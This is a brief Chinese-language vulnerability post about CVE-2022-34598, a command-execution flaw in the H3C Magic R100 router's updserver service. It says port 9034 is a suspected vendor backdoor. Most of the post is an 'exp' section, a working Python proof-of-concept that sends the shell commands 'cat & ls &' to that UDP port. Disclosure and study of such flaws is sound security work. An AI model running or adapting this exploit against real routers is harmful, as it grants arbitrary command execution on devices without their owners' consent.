H3C_magic_R100路由器的UDPserver中存在命令执行漏洞(CVE-2022-34598)

H3C_magic_R100路由器的UDPserver中存在命令执行漏洞(CVE-2022-34598)

H3C Magic R100 存在安全漏洞,该漏洞源于updserver服务打开了疑似官方后门的9034端口,允许攻击者执行任意命令。

exp

1
2
3
4
5
6
7
8
9
10
11
12
import socket

Ip="0.0.0.0"
Port=9034

msg=b"cat & ls &"
server_address=(Ip,Port)

udp_socket=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_socket.sendto(msg,server_address)

udp_socket.close()

漏洞来源